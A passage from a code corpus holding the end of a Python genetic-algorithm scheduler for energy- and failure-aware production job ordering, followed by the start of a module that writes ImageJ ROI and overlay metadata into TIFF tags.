np.random.rand() < self.mutation_rate:\r\n tmpl = list(range(self.dna_size))\r\n try:\r\n #if prob:\r\n # point = np.random.choice(tmpl, size=1, replace=False, p=prob)\r\n #else:\r\n point = np.random.choice(tmpl, size=1, replace=False)\r\n except:\r\n import pdb; pdb.set_trace()\r\n # tmpl.pop(int(point))\r\n # prob.pop(int(point))\r\n # inverse = list(np.array(prob).max() - np.array(prob))\r\n # inverse = inverse / sum(inverse)\r\n if perimeter == None:\r\n perimeter = len(tmpl)\r\n random_number = np.random.choice(list(range(-perimeter, perimeter+1)), size=1)\r\n swap_point = int(point) + int(random_number)\r\n if swap_point >= len(loser):\r\n swap_point = len(loser)-1\r\n if swap_point < 0:\r\n swap_point = 0\r\n #swap_point = np.random.choice(tmpl, size=1, replace=False)\r\n #import pdb; pdb.set_trace()\r\n # swap_point = int(swap_point); point = int(point)\r\n # point, swap_point = np.random.randint(0, self.dna_size, size=2)\r\n loser[swap_point], loser[point] = loser[point], loser[swap_point]\r\n return loser\r\n \r\n\r\n def mutate_swap(self, loser, prob=False):\r\n ''' Using microbial genetic evolution strategy, mutation only works on the loser.\r\n One job changes place here.\r\n '''\r\n loser = list(loser)\r\n # mutation for loser, randomly choose two points and do the swap\r\n if np.random.rand() < self.mutation_rate:\r\n if prob:\r\n tmpl = list(range(self.dna_size))\r\n try:\r\n point = int(np.random.choice(tmpl, size=1, replace=False, p=prob))\r\n except:\r\n import pdb; pdb.set_trace()\r\n raise\r\n tmpl.pop(int(point))\r\n # prob.pop(int(point))\r\n # inverse = list(np.array(prob).max() - np.array(prob))\r\n # inverse = inverse / sum(inverse)\r\n insert_point = int(np.random.choice(tmpl, size=1, replace=False))\r\n else:\r\n point, insert_point = np.random.choice(range(self.dna_size), size=2, replace=False)\r\n point = int(point); insert_point = int(insert_point)\r\n # point, swap_point = np.random.randint(0, self.dna_size, size=2)\r\n #import pdb; pdb.set_trace()\r\n loser.insert(insert_point, loser.pop(point))\r\n #swap_A, swap_B = loser[point], loser[swap_point]\r\n #loser[point], loser[swap_point] = swap_B, swap_A\r\n return loser \r\n \r\n def evolve(self, n, evolution=None):\r\n ''' \r\n Execution of the provided GA.\r\n\r\n Parameters\r\n ----------\r\n n: int\r\n Number of iteration times \r\n '''\r\n\r\n i = 1\r\n if evolution == None:\r\n evolution = self.evolution_method\r\n num_couples = 1\r\n\r\n while i <= n: # n is the number of evolution times in one iteration\r\n\r\n if evolution == 'roulette':\r\n fitness = self.fitness\r\n self.pop = self.pop[np.argsort(fitness)]\r\n self.fitness = np.sort(fitness)\r\n\r\n # choose sub-population according to roulette principle\r\n idx = range(len(self.pop))\r\n prob = [1/(x+2) for x in idx]\r\n prob = [p / sum(prob) for p in prob]\r\n # roulette wheel \r\n sub_pop_idx = np.random.choice(idx, size=num_couples * 2, replace=False, p=prob)\r\n elif evolution == 'random': # if evolution = 'random':\r\n sub_pop_idx = np.random.choice(np.arange(0, self.pop_size), size=2, replace=False)\r\n else:\r\n raise ValueError('Evolution parameter should be one of [random, roulette], not found.')\r\n\r\n # for each pair of schedules:\r\n for j in list(range(len(sub_pop_idx) >> 1)):\r\n temp_pop_idx = sub_pop_idx[j:j+2]\r\n #sub_pop = self.pop[temp_pop_idx] # pick 2 individuals from pop\r\n #fitness = self.get_fitness(sub_pop) # get the fitness values of the two\r\n \r\n # Elitism Selection\r\n #winner_loser_idx = np.argsort(fitness)\r\n 
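crossover_function above implements the microbial, mask-based order crossover (Bierwirth): positions flagged by a random boolean mask keep the loser's genes, and the remaining positions are filled with the winner's leftover genes in their original order, so the child is always a valid permutation of the jobs. A standalone sketch of the same operator, assuming plain Python lists of job ids:

import random

def microbial_crossover(loser, winner):
    # True positions come from the loser; the rest are filled, in order,
    # from whatever the winner has left after those genes are removed.
    mask = [bool(random.randint(0, 1)) for _ in loser]
    remaining = list(winner)
    for keep, gene in zip(mask, loser):
        if keep:
            remaining.remove(gene)
    child, j = [], 0
    for keep, gene in zip(mask, loser):
        if keep:
            child.append(gene)
        else:
            child.append(remaining[j])
            j += 1
    return child  # always a permutation of the same job set

print(microbial_crossover([1, 2, 3, 4, 5], [5, 4, 3, 2, 1]))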
if evolution == 'roulette':\r\n winner_loser_idx = np.sort(temp_pop_idx)\r\n elif evolution == 'random':\r\n sub_pop = self.pop[temp_pop_idx] # pick 2 individuals from pop\r\n fitness = self.fitness[temp_pop_idx]\r\n #fitness = self.get_fitness(sub_pop) # get the fitness values of the two\r\n winner_loser_idx = temp_pop_idx[np.argsort(fitness)]\r\n else:\r\n raise ValueError('Evolution parameter should be one of [random, roulette], not found.')\r\n \r\n# print('winner_loser_idx', winner_loser_idx)\r\n\r\n winner_loser = np.array([np.array(p.order) for p in self.pop[winner_loser_idx]])\r\n winner = winner_loser[0]; loser = winner_loser[1] # the first is winner and the second is loser\r\n\r\n #print('\\nsubpop', winner_loser)\r\n #time.sleep(0.1)\r\n \r\n origin = loser.copy() # pick up the loser for genetic operations\r\n\r\n # Crossover (of the winner and the loser)\r\n winner_loser = self.crossover(winner_loser)\r\n \r\n # Mutation (only on the child)\r\n loser = winner_loser[1]\r\n for k in range(self.num_mutations):\r\n # determine mismatch for each task\r\n if evolution == 'roulette':\r\n detailed_fitness = self.schedule.copy_neworder(loser).get_fitness(detail=True)\r\n if sum(detailed_fitness) == 0:\r\n detailed_fitness = [f+1 for f in detailed_fitness]\r\n #detailed_fitness = self.get_fitness([self.schedule.copy_neworder(loser)], detail=True)[0]\r\n # detailed_fitness = self.get_fitness([Schedule(loser, self.job_dict, self.start_time, \r\n # self.product_related_characteristics_dict,\r\n # self.down_duration_dict, self.price_dict, self.precedence_dict, self.failure_info,\r\n # self.scenario, self.duration_str, self.working_method, self.weights)], detail=True)[0]\r\n #print(detailed_fitness)\r\n mutation_prob = [f/sum(detailed_fitness) for f in detailed_fitness]\r\n #loser = self.mutate(loser)\r\n loser = self.mutate(loser, mutation_prob)\r\n elif evolution == 'random':\r\n loser = self.mutate(loser)\r\n else:\r\n raise ValueError('Evolution parameter should be one of [random, roulette], not found.')\r\n winner_loser[1] = loser\r\n\r\n # for i in np.arange(, self.pop_size):\r\n # other = self.pop[i]\r\n # for j in range(self.num_mutations):\r\n # other = self.mutate(other)\r\n # self.pop[i] = other\r\n\r\n# print(\"Start validate:\")\r\n flag = 0\r\n \r\n loser = self.schedule.copy_neworder(loser)\r\n # loser = Schedule(loser, self.job_dict, self.start_time, self.product_related_characteristics_dict,\r\n # self.down_duration_dict, self.price_dict, self.precedence_dict, self.failure_info, \r\n # self.scenario, self.duration_str, self.working_method, self.weights)\r\n \r\n #print('validation step')\r\n flag = 0\r\n #if self.validation:\r\n # if not loser.validate():\r\n # pass\r\n #self.pop[sub_pop_idx] = winner_loser\r\n #i = i + 1 # End of an evolution procedure\r\n #flag = 1\r\n\r\n if flag == 0:\r\n if evolution == 'roulette':\r\n bottomlist = list(range(self.pop_size >> 1, self.pop_size))\r\n choice = np.random.choice(bottomlist)\r\n self.pop[choice] = loser\r\n # sort the fitness values\r\n # fitness = self.fitness\r\n # replace one of the least values for fitness\r\n self.fitness[choice] = self.get_fitness([loser])[0]\r\n else:\r\n self.pop[winner_loser_idx[1]] = loser\r\n self.fitness[winner_loser_idx[1]] = self.get_fitness([loser])[0]\r\n\r\n\r\n #print('After:', self.get_fitness(self.pop))\r\n i = i + 1 # End of procedure\r\n else:\r\n #print(\"In memory, start genetic operation again!\")\r\n pass\r\n #else:\r\n #print(\"Distance too small, start genetic operation 
again!\")\r\n # pass\r\n\r\n #if evolution != 'roulette':\r\n # fitness = self.get_fitness(self.pop)\r\n\r\n return self.pop, self.fitness\r\n\r\n\r\ndef run_bf(start_time, end_time, down_duration_file, failure_file, prod_rel_file, energy_file, job_file,\r\n scenario, weights, duration_str='duration', \r\n working_method='historical', failure_info=None):\r\n # Generate raw material unit price\r\n if working_method == 'historical':\r\n try:\r\n down_duration_dict = select_from_range(start_time, end_time, read_down_durations(down_duration_file), 0, 1) # File from EnergyConsumption/InputOutput\r\n #print('test')\r\n if weight_failure != 0:\r\n if (failure_file is not None):\r\n failure_list = read_failure_data(failure_file) # File from failuremodel-master/analyse_production\r\n #print(weight_failure)\r\n #hourly_failure_dict = get_hourly_failure_dict(start_time, end_time, failure_list, down_duration_dict)\r\n #with open('range_hourly_failure_rate.csv', 'w', newline='\\n') as csv_file:\r\n # writer = csv.writer(csv_file)\r\n # for key, value in hourly_failure_dict.items():\r\n # writer.writerow([key, value])\r\n failure_info = None\r\n else:\r\n raise ValueError('No failure info found!')\r\n except:\r\n warnings.warn('Import of downtime durations failed, using scheduling without failure information.')\r\n failure_downtimes = True\r\n if (working_method != 'historical') or failure_downtimes:\r\n warnings.warn('No import of downtime durations.')\r\n down_duration_dict = {}\r\n\r\n# print(\"down_duration_dict: \", down_duration_dict)\r\n# print(\"hourly_failure_dict: \", hourly_failure_dict)\r\n# exit()\r\n \r\n product_related_characteristics_dict = read_product_related_characteristics(prod_rel_file)\r\n \r\n price_dict_new = read_price(energy_file) # File from EnergyConsumption/InputOutput\r\n# price_dict_new = read_price('electricity_price.csv') # File generated from generateEnergyCost.py\r\n if (start_time != None) and (end_time != None):\r\n job_dict_new = select_from_range(start_time, end_time, read_jobs(job_file), 'start', 'end') # File from EnergyConsumption/InputOutput\r\n elif (start_time != None):\r\n job_dict_new = read_jobs(job_file)\r\n else:\r\n raise NameError('No start time found!')\r\n\r\n job_dict_new = job_dict_new.astype(job_dict)\r\n\r\n # TODO: change\r\n# print(\"failure_dict\", failure_dict)\r\n# exit()\r\n# # write corresponding failure dict into file\r\n# with open('ga_013_failure_plot.csv', 'w', newline='\\n') as csv_file:\r\n# writer = csv.writer(csv_file)\r\n# for key, value in failure_dict_new.items():\r\n# writer.writerow([key, value])\r\n\r\n waiting_jobs = [*job_dict_new]\r\n \r\n if not waiting_jobs:\r\n raise ValueError(\"No waiting jobs!\")\r\n else:\r\n try:\r\n first_start_time = job_dict_new.get(waiting_jobs[0])['start'] # Find the start time of original schedule\r\n except:\r\n first_start_time = start_time\r\n\r\n bf = BF(job_dict=job_dict_new, price_dict=price_dict_new,\r\n product_related_characteristics_dict = product_related_characteristics_dict, down_duration_dict=down_duration_dict,\r\n start_time=first_start_time, weights=weights, scenario=scenario, working_method=working_method, \r\n duration_str=duration_str, failure_info=failure_info)\r\n \r\n best_result, worst_result, best_schedule, worst_schedule = bf.check_all()\r\n\r\n best_schedule = Schedule(best_schedule, job_dict_new, first_start_time, product_related_characteristics_dict,\r\n down_duration_dict, price_dict_new, failure_info, scenario, duration_str, working_method, weights)\r\n\r\n 
f_cost, vf_cost, e_cost, c_cost, d_cost, ft_cost, factors = best_schedule.get_fitness(split_types=True)\r\n total_cost = f_cost * factors[0] + vf_cost * factors[1] + e_cost * factors[2] + c_cost * factors[3] + d_cost * factors[4] + ft_cost * factors[5]\r\n #total_cost = list(itertools.chain(*total_cost))\r\n #import pdb; pdb.set_trace()\r\n\r\n print(\"Best failure cost: \" + str(f_cost))\r\n print(\"Best virtual failure cost: \" + str(vf_cost))\r\n print(\"Best energy cost: \" + str(e_cost)) \r\n print(\"Best conversion cost: \" + str(c_cost))\r\n print(\"Best deadline cost: \" + str(d_cost))\r\n print(\"Best flowtime cost: \" + str(ft_cost))\r\n print(\"Factors: \" + str(factors))\r\n print(\"Best total cost: \" + str(total_cost))\r\n print()\r\n \r\n\r\n worst_schedule = Schedule(worst_schedule, job_dict_new, first_start_time, product_related_characteristics_dict,\r\n down_duration_dict, price_dict_new, failure_info, scenario, duration_str, working_method, weights)\r\n\r\n f_cost, vf_cost, e_cost, c_cost, d_cost, ft_cost, factors = worst_schedule.get_fitness(split_types=True)\r\n total_cost = f_cost * factors[0] + vf_cost * factors[1] + e_cost * factors[2] + c_cost * factors[3] + d_cost * factors[4] + ft_cost * factors[5]\r\n #total_cost = list(itertools.chain(*total_cost))\r\n #import pdb; pdb.set_trace()\r\n\r\n print(\"Worst failure cost: \" + str(f_cost))\r\n print(\"Worst virtual failure cost: \" + str(vf_cost))\r\n print(\"Worst energy cost: \" + str(e_cost)) \r\n print(\"Worst conversion cost: \" + str(c_cost))\r\n print(\"Worst deadline cost: \" + str(d_cost))\r\n print(\"Worst flowtime cost: \" + str(ft_cost))\r\n print(\"Factors: \" + str(factors))\r\n print(\"Worst total cost: \" + str(total_cost))\r\n\r\n # best_result_dict = best_schedule.get_time()\r\n # worst_result_dict = worst_schedule.get_time()\r\n\r\n return best_result, worst_result, best_schedule, worst_schedule \r\n\r\n \r\n# def run_opt(start_time, end_time, down_duration_file, failure_file, prod_rel_file, precedence_file, energy_file, job_file, failure_info,\r\n# urgent_job_info, breakdown_record_file, scenario, iterations, cross_rate, mut_rate, pop_size, num_mutations=5, adaptive=[],\r\n# stop_condition='num_iterations', stop_value=None, weights={},\r\n# duration_str='duration', evolution_method='roulette', validation=False, pre_selection=False, working_method='historical', add_time=0,\r\n# remove_breaks=False):\r\n\r\ndef run_opt(original_schedule, settings, start_time=None):\r\n\r\n iterations = settings.iterations\r\n stop_condition = settings.stop_condition\r\n stop_value = settings.stop_value\r\n adaptive = settings.adapt_ifin\r\n \r\n # if multiple schedules of course the costs of both the schedules will be saved\r\n # after the first schedule is calculated the end time is saved and then the next schedule is calculated from then on\r\n # initialise some data structures to save all of this\r\n try:\r\n logging.info('Using '+ str(original_schedule.working_method) + ' method')\r\n if start_time == None:\r\n logging.info(\"Original schedule start time: \" + str(original_schedule.start_time.isoformat()))\r\n else:\r\n logging.info(\"Schedule start time: \" + str(start_time.isoformat()))\r\n original_schedule.set_starttime(start_time)\r\n except: \r\n pass\r\n \r\n total_result = original_schedule.get_fitness()\r\n # original_schedule.validate()\r\n result_dict = {}\r\n result_dict.update({0:total_result})\r\n \r\n ga = GA(original_schedule, settings)\r\n\r\n best_result_list = []\r\n worst_result_list = [] 
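The optimisation loop below supports three stop conditions (num_iterations, end_value, abs_time). A compact sketch of the same pattern, with step() standing in for one ga.evolve(1) generation (the names here are illustrative):

import time

def optimize(step, stop_condition="num_iterations", stop_value=100):
    # step() performs one GA generation and returns the current best fitness.
    generation, t0 = 0, time.monotonic()
    while True:
        best = step()
        generation += 1
        if stop_condition == "num_iterations" and generation >= stop_value:
            break  # fixed iteration budget exhausted
        if stop_condition == "end_value" and best < stop_value:
            break  # target fitness reached
        if stop_condition == "abs_time" and time.monotonic() - t0 >= stop_value:
            break  # wall-clock budget (seconds) exhausted
    return best

print(optimize(lambda: 1.0, "num_iterations", 5))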
\r\n mean_result_list = []\r\n best_result_list_no_constraint = []\r\n worst_result_list_no_constraint = [] \r\n generation = 0\r\n stop = False\r\n timer0 = time.monotonic()\r\n \r\n #no_constraint = original_schedule.weights.copy()\r\n #no_constraint['weight_constraint'] = 0\r\n while not stop:\r\n if generation in adaptive:\r\n print()\r\n print(str(generation) + ' reached - changing parameters of the GA')\r\n ga.cross_rate /= 2\r\n ga.mutation_rate = (ga.mutation_rate + 1) / 2\r\n #ga.cross_rate = (ga.cross_rate + 1) / 2\r\n #ga.mutation_rate /= 2\r\n# print(\"Gen: \", generation)\r\n pop, res = ga.evolve(1) # natural selection, crossover and mutation\r\n #print(\"pop:\", pop)\r\n #print(\"res:\", res)\r\n #import pdb; pdb.set_trace()\r\n best_index = np.argmin(res)\r\n worst_index = np.argmax(res)\r\n mean = np.mean(res)\r\n sys.stdout.write(f'\\r{generation}/{iterations}:\\t{res[best_index]:15.3f}')\r\n #print(str(generation) + '/' + str(iterations) + ':\\t' + str(res[best_index]), end=''); \r\n sys.stdout.flush() # overwrite this line continually\r\n generation += 1\r\n\r\n best_result_list.append(res[best_index])\r\n worst_result_list.append(res[worst_index])\r\n mean_result_list.append(mean)\r\n \r\n #best_result_list_no_constraint.append(pop[best_index].get_fitness(weights=no_constraint))\r\n #worst_result_list_no_constraint.append(pop[worst_index].get_fitness(weights=no_constraint))\r\n\r\n if generation >= iterations:\r\n stop = True\r\n if stop_condition == 'end_value':\r\n if res[best_index] < stop_value:\r\n print('\\n')\r\n stop = True\r\n elif stop_condition == 'abs_time':\r\n timer1 = time.monotonic() # returns time in seconds\r\n elapsed_time = timer1-timer0\r\n if elapsed_time >= stop_value:\r\n print('\\n')\r\n stop = True\r\n if sys.platform == \"win32\" and msvcrt.kbhit() == True: # Only works on Windows\r\n char = msvcrt.getche()\r\n if char in [b'c', b'q']:\r\n print('\\nUser hit c or q button, exiting...')\r\n stop = True\r\n \r\n lists_result = pd.DataFrame({'best': best_result_list, 'mean': mean_result_list, 'worst': worst_result_list})\r\n #lists_result_no_constraint = pd.DataFrame({'best': best_result_list_no_constraint, 'worst': worst_result_list_no_constraint})\r\n \r\n timer1 = time.monotonic()\r\n elapsed_time = timer1-timer0\r\n \r\n logging.info('Stopping after ' + str(generation) + ' iterations. 
Elapsed time: ' + str(round(elapsed_time, 2)))\r\n \r\n\r\n print()\r\n logging.info(\"Candidate schedule \" + str(pop[best_index].order))\r\n candidate_schedule = pop[best_index]\r\n \r\n if settings.validation == True:\r\n valid = candidate_schedule.validate()\r\n if valid:\r\n logging.info('Valid schedule found')\r\n else:\r\n logging.info('Invalid schedule found!')\r\n\r\n candidate_schedule.print_fitness()\r\n\r\n total_cost = candidate_schedule.get_fitness()\r\n \r\n# print(\"Most fitted cost: \", res[best_index])\r\n\r\n logging.info(\"\\nOriginal schedule: \" + str(original_schedule.order))\r\n# print(\"DNA_SIZE:\", DNA_SIZE) \r\n \r\n original_schedule.print_fitness()\r\n\r\n original_cost = original_schedule.get_fitness()\r\n \r\n #print(duration_str)\r\n #result_dict = candidate_schedule.get_time()\r\n #result_dict = visualize(candidate_schedule, first_start_time, job_dict_new, price_dict_new, product_related_characteristics_dict, \r\n # down_duration_dict, hourly_failure_dict, energy_on=True, failure_on=True, duration_str=duration_str, working_method=working_method)\r\n #import pdb; pdb.set_trace()\r\n #result_dict_origin = original_schedule.get_time()\r\n #result_dict_origin = visualize(original_schedule, first_start_time, job_dict_new, price_dict_new, product_related_characteristics_dict, \r\n # down_duration_dict, hourly_failure_dict, energy_on=True, failure_on=True, duration_str=duration_str, working_method=working_method)\r\n# print(\"Visualize_dict_origin:\", result_dict)\r\n# print(\"Down_duration\", down_duration_dict)\r\n\r\n\r\n # # Output for visualization\r\n # with open('executionRecords.csv', 'w', newline='\\n') as csv_file:\r\n # writer = csv.writer(csv_file)\r\n # for key, value in result_dict.items():\r\n # writer.writerow([key, value['start'], value['end'], value['totaltime']])\r\n \r\n # with open('originalRecords.csv', 'w', newline='\\n') as csv_file:\r\n # writer = csv.writer(csv_file)\r\n # for key, value in result_dict_origin.items():\r\n # writer.writerow([key, value['start'], value['end'], value['totaltime']])\r\n \r\n # with open('downDurationRecords.csv', 'w', newline='\\n') as csv_file:\r\n # writer = csv.writer(csv_file)\r\n # for key, value in original_schedule.downdur_dict.items():\r\n # writer.writerow([key, value[0], value[1]]) \r\n \r\n return total_cost, original_cost, candidate_schedule, original_schedule, lists_result#, lists_result_no_constraint\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n # Read parameters\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"mode\", type=int, help=\"The running mode of the scheduler: 1-User 2-Demo\", default=1)\r\n # TODO: procedures after the user choose mode\r\n parser.add_argument(\"historical_down_periods_file\", help=\"File containing records of historical down duration periods.\") # downDurations.csv\r\n parser.add_argument(\"failure_rate_file\", help=\"File containing failure rate of each hour from the failure model.\") # hourly_failure_rate.csv\r\n parser.add_argument(\"product_related_characteristics_file\", help=\"File containing product related characteristics.\") # productRelatedCharacteristics.csv\r\n parser.add_argument(\"energy_price_file\", help=\"File containing energy price of each hour.\") # price.csv\r\n parser.add_argument(\"job_info_file\", help=\"File containing job information.\") # jobInfoProd_ga_013.csv\r\n parser.add_argument(\"scenario\", type=int, help=\"Choose scenario: 1-MTBF 2-Machine stop/restart\") # number of scenario\r\n parser.add_argument(\"objective\", 
type=int, help=\"Choose objectives: 1-Energy+Failure 2-Energy Only 3-Failure Only\", default=1) \r\n # TODO: prodedures after the user choose objectives\r\n parser.add_argument(\"pop_size\", type=int, help=\"Population size\") # pupulation size\r\n parser.add_argument(\"generations\", type=int, help=\"Number of generations\")\r\n parser.add_argument(\"crossover_rate\", type=float, help=\"Crossover rate\")\r\n parser.add_argument(\"mutation_rate\", type=float, help=\"Mutation rate\")\r\n args = parser.parse_args()\r\n \r\n# case 1 week\r\n ''' Use start_time and end_time to pick up a waiting job list from records.\r\n Available range: 2016-01-23 17:03:58.780 to 2017-11-15 07:15:20.500\r\n '''\r\n start_time = datetime(2016, 11, 3, 6, 0)\r\n end_time = datetime(2016, 11, 8, 0, 0)\r\n\r\n run_opt(start_time, end_time, args.historical_down_periods_file, \r\n args.failure_rate_file, args.product_related_characteristics_file, \r\n args.energy_price_file, args.job_info_file,\r\n args.scenario, args.generations, args.crossover_rate, args.mutation_rate, args.pop_size)","sub_path":"ELITEPython/Deliverable/SchedulerV000.py","file_name":"SchedulerV000.py","file_ext":"py","file_size_in_byte":41136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"424713834","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 21 09:36:16 2017\n\n@author: mittelberger2\n\"\"\"\n\n#extratags = [(50838, 'I', 2, IJMD.bytecounts, True), (50839, 'B', len(IJMD.metadata), struct.unpack('>'+'B'*len(IJMD.metadata), IJMD.metadata))]\n\nimport struct\nimport numpy as np\n\n# Constants\nHEADER_SIZE = 64\nHEADER2_SIZE = 64\nVERSION = 227\n# Offsets\nVERSION_OFFSET = 4\nTYPE = 6\nTOP = 8\nLEFT = 10\nBOTTOM = 12\nRIGHT = 14\nN_COORDINATES = 16\nX1 = 18\nY1 = 22\nX2 = 26\nY2 = 30\nXD = 18\nYD = 22\nWIDTHD = 26\nHEIGHTD = 30\nSTROKE_WIDTH = 34\nSTROKE_COLOR = 40\nOPTIONS = 50\nHEADER2_OFFSET = 60\nCOORDINATES = 64\n# Options\nSUB_PIXEL_RESOLUTION = 128\n# Types\nroi_types = {\n 'polygon': 0,\n 'rect': 1,\n 'oval': 2,\n 'line': 3,\n 'freeline': 4,\n 'polyline': 5,\n 'noRoi': 6,\n 'freehand': 7,\n 'traced': 8,\n 'angle': 9,\n 'point': 10\n }\n# Field data types\ndtypes = {\n VERSION: '>h',\n TYPE: 'h',\n LEFT: '>h',\n BOTTOM: '>h',\n RIGHT: '>h',\n X1: '>f',\n Y1: '>f',\n X2: '>f',\n Y2: '>f',\n XD: '>f',\n YD: '>f',\n WIDTHD: '>f',\n HEIGHTD: '>f',\n N_COORDINATES: '>h',\n STROKE_WIDTH: '>h',\n STROKE_COLOR: '>3s',\n# OPTIONS: '>h',\n HEADER2_OFFSET: '>i',\n COORDINATES: ('>h', '>f') # save coordinates as 'ints' or 'floats' depending on subpixel_resolution being enabled\n }\n\nclass default_dict(dict):\n def __init__(self, *mapping, **elements):\n super().__init__(*mapping, **elements)\n self._default_value = None\n\n def set_default_value(self, default_value):\n self._default_value = default_value\n\n def __getitem__(self, key):\n if not self.__contains__(key) and self._default_value is not None:\n return self._default_value\n else:\n return super().__getitem__(key)\n\ndtypes = default_dict(dtypes)\ndtypes.set_default_value('>h')\n\nclass IJMetadata(object):\n def __init__(self):\n self._rois = []\n self._overlays = []\n self._labels = []\n self._info = []\n self._luts = []\n self._ranges = []\n self._extras = []\n\n @property\n def bytecounts(self):\n bytecounts = tuple()\n header_size = self.ntypes * 8 + 4\n bytecounts += (header_size,)\n\n for md_type in [self._rois, self._overlays, self._labels, self._info, self._luts, self._ranges, 
self._extras]:\n for properties in md_type:\n bytecounts += (len(properties['bytestring']),)\n\n return bytecounts\n\n @property\n def metadata(self):\n metadata_bytestring = b'IJIJ'\n if len(self._rois) > 0:\n metadata_bytestring += b'roi ' + struct.pack('>i', len(self._rois))\n if len(self._overlays) > 0:\n metadata_bytestring += b'over' + struct.pack('>i', len(self._overlays))\n if len(self._info) > 0:\n metadata_bytestring += b'info' + struct.pack('>i', len(self._info))\n for extra_tag in self._extras:\n metadata_bytestring += extra_tag['type'] + struct.pack('>i', 1)\n\n for md_type in [self._rois, self._overlays, self._labels, self._info, self._luts, self._ranges, self._extras]:\n for properties in md_type:\n metadata_bytestring += properties['bytestring']\n\n return metadata_bytestring\n\n @property\n def ntypes(self):\n ntypes = 0\n if len(self._rois) > 0:\n ntypes += 1\n if len(self._overlays) > 0:\n ntypes += 1\n if len(self._labels) > 0:\n ntypes += 1\n if len(self._info) > 0:\n ntypes += 1\n if len(self._luts) > 0:\n ntypes += 1\n if len(self._ranges) > 0:\n ntypes += 1\n ntypes += len(self._extras)\n return ntypes\n\n @property\n def tifffile_extratags(self):\n metadata = self.metadata\n return [(50838, 'I', len(self.bytecounts), self.bytecounts, True), (50839, 'B', len(metadata),\n struct.unpack('>'+'B'*len(metadata), metadata))]\n\n def _add_data(self, offset, data):\n assert offset != COORDINATES\n if np.iterable(offset):\n assert len(offset) == len(data)\n else:\n offset = (offset,)\n data = (data,)\n for i in range(len(offset)):\n self.roi_bytes[offset[i]:offset[i]+struct.calcsize(dtypes[offset[i]])] = struct.pack(dtypes[offset[i]],\n data[i])\n\n def _add_roi_or_overlay(self, md_type: str, properties: dict, roi_type='point'):\n \"\"\"\n md_type must be a 4 character imagej type string ('roi ' or 'over')\n \"\"\"\n assert roi_type in roi_types, 'Unknown roi type'\n assert type(properties.get('points')) == list\n npoints = len(properties.get('points'))\n float_size = 0\n roi_name_size = 0\n roi_props_size = 0\n counters_size = 0\n\n if roi_type in ['point', 'rect', 'line', 'oval']:\n properties['subpixel_resolution'] = True\n if roi_type in ['rect', 'oval']:\n assert npoints == 4\n npoints = 0\n if roi_type == 'line':\n assert npoints == 2\n npoints = 0\n\n float_size = npoints*8\n\n self.roi_bytes = bytearray(b'\\x00'*(HEADER_SIZE + HEADER2_SIZE + npoints*4 + float_size + roi_name_size +\n roi_props_size + counters_size))\n\n self.roi_bytes[:4] = b'Iout'\n self._add_data(VERSION_OFFSET, VERSION)\n self._add_data(TYPE, roi_types[roi_type])\n\n points = np.array(properties.get('points'), dtype=np.float32)\n\n top = int(np.amin(points[:, 0]))\n left = int(np.amin(points[:, 1]))\n bottom = int(np.amax(points[:, 0]))\n right = int(np.amax(points[:, 1]))\n if right == left:\n right += 1\n if bottom == top:\n bottom += 1\n self._add_data((TOP, LEFT, BOTTOM, RIGHT), (top, left, bottom, right))\n\n self._add_data(N_COORDINATES, npoints)\n self._add_data(STROKE_WIDTH, 1)\n if md_type == 'over':\n self._add_data(STROKE_COLOR, bytes([255, 255, 255]))\n self._add_data(OPTIONS, SUB_PIXEL_RESOLUTION)\n self._add_data(HEADER2_OFFSET, HEADER_SIZE + 4*npoints + float_size)\n\n if roi_type in ['rect', 'oval']:\n self._add_data(XD, left)\n self._add_data(YD, top)\n self._add_data(HEIGHTD, bottom-top)\n self._add_data(WIDTHD, right-left)\n\n if roi_type == 'line':\n self._add_data(X1, points[0, 1])\n self._add_data(Y1, points[0, 0])\n self._add_data(X2, points[1, 1])\n self._add_data(Y2, 
points[1, 0])\n\n if npoints > 0:\n if properties.get('subpixel_resolution'):\n coordinates_format = dtypes[COORDINATES][1]\n base1 = COORDINATES + 4*npoints\n base2 = base1 + 4*npoints\n for i in range(npoints):\n self.roi_bytes[base1+4*i:base1+4*i+4] = struct.pack(coordinates_format, points[i, 1])\n self.roi_bytes[base2+4*i:base2+4*i+4] = struct.pack(coordinates_format, points[i, 0])\n else:\n coordinates_format = dtypes[COORDINATES][0]\n base1 = COORDINATES + 2*npoints\n base2 = base1 + 2*npoints\n for i in range(npoints):\n self.roi_bytes[base1+2*i:base1+2*i+2] = struct.pack(coordinates_format, int(points[i, 1]))\n self.roi_bytes[base2+2*i:base2+2*i+2] = struct.pack(coordinates_format, int(points[i, 0]))\n\n properties['bytestring'] = bytes(self.roi_bytes)\n if md_type == 'roi ':\n self._rois.append(properties)\n elif md_type == 'over':\n self._overlays.append(properties)\n else:\n raise ValueError('\"md_type\" must be one of (\"roi \", \"over)')\n\n delattr(self, 'roi_bytes')\n\n def add_roi(self, roi_properties: dict, roi_type='point'):\n \"\"\"\n roi_properties (dict):\n points: list of (y, x) tuples in pixels, MUST be a list even if only one pair of coordinates.\n For a rectangle it must be the four corners of the rectangle, for a line the two endpoints and\n for an oval the corners of the bounding rectangle.\n position: position of roi in a stack (only required for stacks), optional\n subpixel_resolution: True/False, optional\n \"\"\"\n self._add_roi_or_overlay('roi ', roi_properties, roi_type=roi_type)\n\n def add_overlay(self, overlay_properties: dict, overlay_type='point'):\n \"\"\"\n overlay_properties (dict):\n points: list of (y, x) tuples in pixels, MUST be a list even if only one pair of coordinates.\n For a rectangle it must be the four corners of the rectangle, for a line the two endpoints and\n for an oval the corners of the bounding rectangle.\n position: position of overlay in a stack (only required for stacks), optional\n subpixel_resolution: True/False, optional\n \"\"\"\n self._add_roi_or_overlay('over', overlay_properties, roi_type=overlay_type)\n\n def add_labels(self, label_properties: dict):\n raise NotImplementedError\n\n def add_info(self, info_properties: dict):\n \"\"\"\n info_properties (dict):\n text: string that contains the text to write to info tag\n encoding: encoding of the text, optional, defaults to 'ASCII'\n \"\"\"\n\n text = info_properties.get('text')\n encoding = info_properties.get('encoding', 'ASCII')\n if text is None:\n return\n\n info_properties['bytestring'] = struct.pack('>' + 'H'*len(text), *bytes(text, encoding))\n self._info.append(info_properties)\n\n def add_luts(self, luts_properties: dict):\n raise NotImplementedError\n\n def add_ranges(self, ranges_properties: dict):\n raise NotImplementedError\n\n def add_extra_metadata(self, extra_properties: dict):\n \"\"\"\n extra_properties (dict):\n bytes: 